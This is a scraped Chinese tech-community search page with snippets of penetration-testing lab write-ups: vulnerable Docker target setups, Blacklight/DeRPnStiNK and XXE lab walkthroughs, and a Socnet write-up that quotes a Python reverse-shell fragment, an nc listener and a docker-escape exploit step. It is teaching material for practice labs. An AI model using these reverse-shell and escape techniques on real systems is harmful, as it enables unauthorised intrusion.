首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用Docker环境快速搭建靶机环境

Docker是近两年来十分流行的开源容器引擎,因此也出现了很多使用Docker容器搭建的靶机环境供新手学习和使用。 ? 这次我们来介绍两款使用docker进行搭建的集成了各种漏洞的靶机环境: 1....环境 docker-compose build 注意: docker自身出错的情况,多出现在使用的docker/docker-compose版本较老时出现的BUG,最好使用最新版docker测试vulhub...Docker可以说是近两年一个特别火热的话题,它以轻巧、简单、开源著称,对于新人来说,使用docker去快速搭建一个靶机环境进行测试莫过于成本最低的一个方法,然而对于不太熟练docker的新手来说,vulapp...Vulhub和vulapp都是非常不错的一套靶机环境,这两款靶机环境都涵盖了最近一段时间比较流行的漏洞。...这里也要给vulhub和vulapp的维护者点个赞,这两套靶机环境的最近更新时间均为半个月之内,同时也涵盖了最近两个月的漏洞,需要感谢他们的开源才使得更多新人能够更快学到更多知识。

3K130
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    渗透测试实战-Blacklight靶机+DeRPnStiNK靶机入侵

    前言 挺久没更新靶机渗透文章,近期抽点时间继续更新文章,为什么这篇要2个靶机写在一起哪?因为第一个靶机虽然被困了几天但是其实比较简单故就和另外一个前段时间玩的合并在一起发表了…....靶机安装/下载 Blacklight靶机下载: https://pan.baidu.com/s/1n1A7UlgDUHL1RdmXN0CDPw DeRPnStiNK靶机下载: https://pan.baidu.com.../s/1ayCZ17PHxFe71vbldjGW2w Blacklight靶机IP:172.16.24.92 DeRPnStiNK靶机IP:172.16.24.69 攻击者IP:172.16.24.31...实战 1.Blacklight靶机 老规矩nmap开路,个人习惯直接全端口… 通过端口探测可以看到该靶机开启了2个服务端口,一个是80,一个是9072端口,其中9072端口显示未知服务…....且权限为root 该靶机完!是不是很简单…. 2.DeRPnStiNK靶机 老规矩!

    1.1K20

    XXE靶机实践

    靶机介绍Haboob团队根据https://www.exploit-db.com/docs/45374发表的论文"XML外部实体注入-解释和利用"制作了这个虚拟机以利用私有网络中的漏洞,我们希望你喜欢这个挑战...靶机攻防攻击主机这里我们使用Kali linux和Windows 11作为本次攻击主机:信息收集由于靶机和攻击者主机Kali处于同一网段,所以我们进行一次网段扫描探测,最终确定靶机IP地址为192.168.204.138nmap...-sS 192.168.204.135/24在浏览器中访问靶机的80端口,发现只有一个apache服务启动随后我们进一步探测目标信息,使用dirsearch进行目录扫描dirsearch -u http...随后再次进行base64解码得到一大串数据信息随后保存以上解码后的文件并以php进行运行(需要低版本的PHP,建议PHP5),得到flag:SAFCSP{xxe_is_so_easy}文末小结本篇文章以XXE靶机为例对

    27010

    靶机】Socnet_wp

    os.dup2(s.fileno(), 2)p = subprocess.call(["/bin/sh", "-i"])建立监听nc -lnvp 1234nice,拿到shell图片值得注意的是,靶机貌似有个...bug,当shell连接中断后,我们无法直接再次连接,只能重启靶机,再故技重施为了避免其他不可避免的错误,编者将环境软件换成了xbox,ip有所变动kali ip:10.0.2.15target ip:...10.0.2.4输入id竟然拿到了root权限,但是事情显然没有这么简单进入root目录没有flag,find也找不到于是回到根目录发现.dockerenv那么我们八成在docker里图片docker逃逸要进行逃逸肯定要扫描一下看看宿主机.../由于靶机没有安装gcc我们需要手动编译且代码部分含有gcc调用的代码,我们也需要删除(137–147行)并且手动运行图片图片编译一下,报错不打紧再找一下所缺失的ofs-lib.so图片python3...-m http.server 888上传我们编译好的exp和ofs-lib.so图片运行发现图片搜索报错发现是kali的libc.so版本问题导致靶机无法运行我们下载较低版本推荐在下载https://ftp.gnu.org

    19910
    领券